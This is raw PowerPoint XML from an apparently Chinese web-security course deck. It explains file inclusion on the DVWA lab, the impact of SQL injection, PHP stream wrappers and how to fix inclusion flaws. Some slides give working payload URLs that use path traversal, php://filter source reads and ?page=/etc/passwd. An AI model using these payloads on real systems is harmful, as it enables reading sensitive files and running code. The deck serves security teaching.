              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞危害：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行任意代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包含恶意文件控制网站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>甚至控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上传带有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码的图片</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://mydvwa.com/dvwa/vulnerabilities/fi</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/?page=../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>a.jpg</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>读取</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://mydvwa.com/dvwa/vulnerabilities/fi</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/?page=php://filter/read=convert.base64-encode/resource=../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>a.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>读取系统敏感文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mydvwa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/vulnerabilities/fi</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/?page=/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1142981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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞对于数据安全的影响</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞会：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>／修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中的库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>和表</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获取用户的账号，密码（可能被加密过），邮箱，联系方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信用卡信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改产品价格</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>删除数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>可执行系统命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改权限，获取系统管理员权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改任意文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安装后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18686543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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件中的封装协议 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>访问本地文件</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>:// — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="is-IS" b="1" dirty="0"/>
              <a:t>访问本地文件系统</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件系统是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用的默认封装协议，展现了本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>://filter -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>对本地磁盘文件进行读写</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一种元封装器，设计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>筛选过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。这对于一体式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(all-in-one)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的文件函数非常有用，类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>readfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>file()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>file_get_contens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，在数据流内容读取之前没有机会应用其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10569007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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件中的封装协议 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码任意执行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>:// — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>访问各个输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>输出流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>(I/O streams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供了一些杂项输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(IO)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流，允许访问 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>读</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>data://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>伪协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一种数据流封装器，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>data:URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> schema(URL schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以是很多形式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪协议进行代码执行的思路原理和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是类似的，都是利用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的流的概念，将原本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的文件流重定向到了用户可控制的输入流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1477557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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件中的封装协议 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目录遍历</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>glob://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>伪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>协议</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>glob:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查找匹配的文件路径模式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10003071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如何修复本地文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不要直接导入用户输入的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内容（与远程文件包含漏洞相同）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>执行代码的参数，或文件名，禁止和用户输入相关，只能由开发人员定义代码内容，用户只能提交“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>参数，代表相应代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18245064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命令执行漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过本知识域，我们会</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>什么是命令注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
